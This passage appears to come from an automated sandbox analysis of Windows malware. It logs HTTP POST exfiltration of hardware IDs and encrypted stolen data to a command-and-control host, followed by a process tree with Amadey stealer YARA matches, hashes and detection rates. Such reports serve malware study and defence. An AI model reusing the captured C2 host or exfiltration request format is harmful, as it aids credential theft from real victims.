                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kfzwc2hSMLzkIzJO4jT3ijr95c8OlrfjCmoKhX7aFW%2FaWSJEU%2Bt12S8a6U9q8jGvYeVjKAm28YZ5Ht%2BngAegUdOj4Uyl%2Ffo4cyEQMufmAdiXUNBhw4l5HMQdAFc0YDRo7QH0R8ho"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e9471ca7a78d6-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1786&rtt_var=706&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20885&delivery_rate=1511387&cwnd=147&unsent_bytes=0&cid=a83317591d0eb4e8&ts=1502&x=0"
                                                                                                                                                              2024-12-18 10:48:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-18 10:48:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.649990172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:23 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=PRO4VUDR
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 1232
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:23 UTC1232OUTData Raw: 2d 2d 50 52 4f 34 56 55 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 31 36 42 30 33 45 37 42 33 36 33 41 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 52 4f 34 56 55 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 52 4f 34 56 55 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 50 52 4f 34 56 55 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                              Data Ascii: --PRO4VUDRContent-Disposition: form-data; name="hwid"F716B03E7B363AF1AC8923850305D13E--PRO4VUDRContent-Disposition: form-data; name="pid"1--PRO4VUDRContent-Disposition: form-data; name="lid"FATE99--test--PRO4VUDRContent-Dispositi
                                                                                                                                                              2024-12-18 10:48:25 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=74slke787hj7iimsvfhh4bdufv; expires=Sun, 13-Apr-2025 04:35:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8i8ekv8BlOuJ1VraK41mVhqkXecZSeL3BYi2nlKrQXMz4IrMHOmmGq6F%2B%2Fk2r%2Fr1YkvTyegzVKJ%2FChzf2SPtSIyV4Ac1ZsP6dmVfgnYSOUOnNyGBfljV%2BCgdjy7mdwwkgS6fY41"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e9489cd3180d3-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1476&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=2142&delivery_rate=1894873&cwnd=230&unsent_bytes=0&cid=ed05b783524bd474&ts=1977&x=0"
                                                                                                                                                              2024-12-18 10:48:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-18 10:48:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.650000172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:27 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=0Z7WEBKP4WS9XZ
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 571932
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 2d 2d 30 5a 37 57 45 42 4b 50 34 57 53 39 58 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 31 36 42 30 33 45 37 42 33 36 33 41 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 5a 37 57 45 42 4b 50 34 57 53 39 58 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 5a 37 57 45 42 4b 50 34 57 53 39 58 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 30 5a 37 57 45 42 4b 50 34
                                                                                                                                                              Data Ascii: --0Z7WEBKP4WS9XZContent-Disposition: form-data; name="hwid"F716B03E7B363AF1AC8923850305D13E--0Z7WEBKP4WS9XZContent-Disposition: form-data; name="pid"1--0Z7WEBKP4WS9XZContent-Disposition: form-data; name="lid"FATE99--test--0Z7WEBKP4
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 66 84 31 36 72 a6 6a 92 6f c3 bc 45 85 ac 3c 3e 56 de 28 35 45 4f ea 4a 62 f9 64 5c 5d 72 31 a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa 3d b9 3f 26 e7
                                                                                                                                                              Data Ascii: f16rjoE<>V(5EOJbd\]r1tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{=?&
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 3f ca da c3 f0 03 e6 1b c7 6e f7 73 9f c0 04 66 fd 9a f9 40 4b 4a 41 25 bb 79 a2 f3 d1 c7 f0 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef 4f fb 30 30 b7
                                                                                                                                                              Data Ascii: ?nsf@KJA%yQ/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6#~ q#O00
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: a7 cd dc a2 df b4 e0 4b 5f bf 7f 5c f3 45 31 38 c1 fc b8 50 a9 ef 0a 69 52 3b f4 27 16 bb 1d e0 c3 7f 69 f3 4f fa aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26 ca b3 35 d0 dd 3c cc 59 04 50 42 52 f0 d7 a4 8e 27 f3 57 65 4a 00
                                                                                                                                                              Data Ascii: K_\E18PiR;'iO71Wb}$Jf_-gFfty"|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&5<YPBR'WeJ
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 44 c1 eb 76 6d 43 cd 55 bf 09 5f 55 47 64 ed 42 75 e0 d8 e0 10 93 b3 78 5c 13 a2 9d e1 b5 9b 66 bb 25 86 7f 5d 4a 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c 1e 5e 6a a7 23 88 ec 8b 3e d6 9b b3 1f 37 c3 75 b9 3b 6b 15 54 d8
                                                                                                                                                              Data Ascii: DvmCU_UGdBux\f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 8f 7e 49 ba 9a ee f5 0b 1e 2f b2 ac 94 e9 01 a0 c2 4b 1a 59 f0 9b 56 4d 40 5d d1 6c a4 42 0c 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9 5f
                                                                                                                                                              Data Ascii: ~I/KYVM@]lB6w4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al__
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: 00 dd 47 ad 0b e3 fc c4 0a 48 6a 04 dd e0 6e 50 e4 83 b8 f6 03 73 ca 8c 50 77 a2 c0 20 3e b5 ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8 ec
                                                                                                                                                              Data Ascii: GHjnPsPw >3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: b7 fc 39 68 57 e4 8b 55 13 2d de 1c 22 7b ae de 7d 74 6e 88 3f 43 aa f2 51 86 bf 69 7c ae 4e 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b f4
                                                                                                                                                              Data Ascii: 9hWU-"{}tn?CQi|N[;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(Mg
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: c3 3c 38 24 80 f7 6d d9 66 e1 21 5b 1a 25 09 ae 6f f6 28 2f e1 5e b1 a2 bd 92 31 34 75 04 e4 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45 22
                                                                                                                                                              Data Ascii: <8$mf![%o(/^14u)vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE"
                                                                                                                                                              2024-12-18 10:48:27 UTC15331OUTData Raw: d6 eb 87 90 2d c9 36 c1 4b bd 06 05 6b 30 31 a5 98 04 1b 1b d2 ac 33 86 7a 7d 36 0b 50 6a 05 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86 67
                                                                                                                                                              Data Ascii: -6Kk013z}6PjI0$3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\g
                                                                                                                                                              2024-12-18 10:48:33 UTC1054INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:33 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=nmdgh6cr1f0dr29cl5las87oco; expires=Sun, 13-Apr-2025 04:35:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cgKdczGaSeqrY6cA9hM%2BCbWHX%2BbnWhF%2BufpVSTaMDZynRPQKp%2FCY7AzyYz%2FVccmWj0c1POhhQhB4Ud%2BA%2Fli4h3MQcsuHzue15VIAGwv9gvTcviv8sE6j0oZv9LrtHV%2FF17nECfp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e94a42d9f42b5-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1599&rtt_var=604&sent=362&recv=592&lost=0&retrans=0&sent_bytes=2849&recv_bytes=574478&delivery_rate=1803582&cwnd=214&unsent_bytes=0&cid=457864391d7179cc&ts=6978&x=0"


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:05:46:23
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\random.exe_Y.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\random.exe_Y.exe"
                                                                                                                                                              Imagebase:0xa0000
                                                                                                                                                              File size:2'985'472 bytes
                                                                                                                                                              MD5 hash:5C4D6B420293FBF347F649016FAB86F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2142098174.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:05:46:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                              Imagebase:0xb80000
                                                                                                                                                              File size:2'985'472 bytes
                                                                                                                                                              MD5 hash:5C4D6B420293FBF347F649016FAB86F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2171173391.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 50%, ReversingLabs
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:05:46:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              Imagebase:0xb80000
                                                                                                                                                              File size:2'985'472 bytes
                                                                                                                                                              MD5 hash:5C4D6B420293FBF347F649016FAB86F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2172004233.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:05:47:00
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              Imagebase:0xb80000
                                                                                                                                                              File size:2'985'472 bytes
                                                                                                                                                              MD5 hash:5C4D6B420293FBF347F649016FAB86F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2506817597.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:05:47:20
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:4'438'776 bytes
                                                                                                                                                              MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:05:47:24
                                                                                                                                                              Start date:18/12/2024
